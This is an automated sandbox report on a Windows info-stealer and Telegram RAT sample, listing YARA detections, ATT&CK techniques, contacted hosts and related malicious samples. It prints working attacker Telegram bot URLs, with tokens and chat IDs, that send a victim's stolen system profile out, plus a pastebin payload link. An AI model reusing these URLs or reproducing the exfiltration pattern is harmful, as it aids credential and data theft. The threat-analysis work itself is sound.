capturing bracketfailed to get memory
Source: 6mllsKaB2q.exe	Binary or memory string: WIN_XPe
Source: 6mllsKaB2q.exe	Binary or memory string: WIN_VISTA
Source: 6mllsKaB2q.exe	Binary or memory string: WIN_7
Source: 6mllsKaB2q.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Remote Access Functionality

Yara detected StormKitty Stealer

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.6mllsKaB2q.exe.dc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.790000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6mllsKaB2q.exe PID: 7068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match

File source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR

Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C31204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		1_2_00C31204
Source: C:\Users\user\Desktop\6mllsKaB2q.exe	Code function: 1_2_00C31806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_00C31806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	111 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Valid Accounts	12 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	248 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	541 Security Software Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	321 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	321 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
6mllsKaB2q.exe	71%	ReversingLabs	Win32.Worm.DorkBot
6mllsKaB2q.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://pastebin.comd	0%	Avira URL Cloud	safe
https://api.telegram.orgD	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.mylnikov.org	172.67.196.114	true	false	high
api.telegram.org	149.154.167.220	true	false	high
pastebin.com	172.67.19.24	true	false	high
icanhazip.com	104.16.185.241	true	false	high
100.41.14.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	high
https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202025-01-10%201:08:51%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20928100%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KSDR3NP%0ARAM:%204095MB%0AHWID:%205C79F150C2%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2060%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2040%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false	high
http://icanhazip.com/	false	high
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956	false	high
https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=6779103906&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	false	high
https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendDocument?chat_id=6779103906	false	high
https://pastebin.com/raw/7B75u64B	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A32000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	false		high
https://api.telegram.org	RegSvcs.exe, 00000007.00000002.2521728981.0000000002669000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://api.telegram.org/bot	RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	false		high
https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendDocument?chat_id=6779	RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://api.telegram.orgD	RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pastebin.comd	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://www.ecosia.org/newtab/	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpB64A.tmp.dat.7.dr	false		high
https://pastebin.com/raw/7B75u64Bd	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://api.telegram.org/bot7935009733:AAGBu91qWsmUHTs2GabvLt2Z62A3M4QqyqE/sendMessage?chat_id=67791	RegSvcs.exe, 00000007.00000002.2521728981.00000000026C3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty	RegSvcs.exe, 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://api.mylnikov.org	RegSvcs.exe, 00000007.00000002.2521728981.000000000263C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/LimerBoy/StormKitty0&	RegSvcs.exe, 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.orgd	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	tmpB64A.tmp.dat.7.dr	false		high
https://api.telegram.org/file/bot	6mllsKaB2q.exe, 00000001.00000002.1306627368.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2520248798.0000000000792000.00000040.80000000.00040000.00000000.sdmp	false		high
http://api.telegram.org	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A32000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2521728981.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000007.00000002.2521728981.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pastebin.com	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpB4FC.tmp.dat.7.dr, tmpB49A.tmp.dat.7.dr	false		high
https://pastebin.com	RegSvcs.exe, 00000007.00000002.2521728981.0000000002A00000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	tmpB64A.tmp.dat.7.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587899
Start date and time:	2025-01-10 19:07:47 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	6mllsKaB2q.exe renamed because original name is a hash value
Original Sample Name:	850fa36792359354c8b5cf86ebb2d6923aa64dece7fc5d555d90d156eaa0409e.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@19/141@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 48 Number of non-executed functions: 298
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 6mllsKaB2q.exe

Simulations

Behavior and APIs

Time	Type	Description
13:08:59	API Interceptor	1867030x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse
172.67.19.24	rrats.exe	Get hash	malicious	AsyncRAT	Browse	pastebin.com/raw/KKpnJShN
	sys_upd.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_menu..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm2.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_phshop..ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	VvPrGsGGWH.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	xK44OOt7vD.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_hiddenz.ps1	Get hash	malicious	AsyncRAT, XWorm	Browse	pastebin.com/raw/sA04Mwk2
104.16.185.241	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	icanhazip.com/
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	icanhazip.com/
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	icanhazip.com/
	iGxCM2I5u9.exe	Get hash	malicious	Flesh Stealer	Browse	icanhazip.com/
	3K5MXGVOJE.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	K6aOw2Jmji.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	jpiWvvEcbp.exe	Get hash	malicious	Stealerium	Browse	icanhazip.com/
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	icanhazip.com/
	L814CyOxMT.exe	Get hash	malicious	Flesh Stealer, PureLog Stealer, zgRAT	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	18e568eb4ca89f8a3e4f04b1eb15472b55b4548f4d153.exe	Get hash	malicious	DCRat	Browse	104.20.3.235
	Solara_v3.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	Solara_v3.exe	Get hash	malicious	Unknown	Browse	104.20.3.235
	Drivespan.dll	Get hash	malicious	Unknown	Browse	104.20.3.235
	XClient.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	ogVinh0jhq.exe	Get hash	malicious	DCRat	Browse	104.20.4.235
	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	CRf9KBk4ra.exe	Get hash	malicious	DCRat	Browse	172.67.19.24
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
api.mylnikov.org	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	172.67.196.114
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	172.67.196.114
	VzhY4BcvBH.exe	Get hash	malicious	AsyncRAT, RedLine, StormKitty, VenomRAT	Browse	172.67.196.114
	d29z3fwo37.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	BTC.exe	Get hash	malicious	AsyncRAT, Rezlt, StormKitty, VenomRAT, Vermin Keylogger, WorldWind Stealer, XWorm	Browse	172.67.196.114
	client2.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	Client.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
api.telegram.org	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	Voicemail_+Transcription+_ATT006151.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	104.21.28.65
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	104.17.25.14
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Encrypted_Archive_2025_LHC1W64SMW.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
CLOUDFLARENETUS	Voicemail_+Transcription+_ATT006151.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	104.21.28.65
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	104.17.25.14
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Encrypted_Archive_2025_LHC1W64SMW.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
CLOUDFLARENETUS	Voicemail_+Transcription+_ATT006151.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	104.21.28.65
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	104.21.48.233
	https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modal	Get hash	malicious	Unknown	Browse	104.17.25.14
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	Encrypted_Archive_2025_LHC1W64SMW.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	YJwE2gTm02.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	MWP0FO5rAF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	AHSlIDftf1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	grW5hyK960.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220 172.67.196.114 172.67.19.24
	grW5hyK960.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114 172.67.19.24
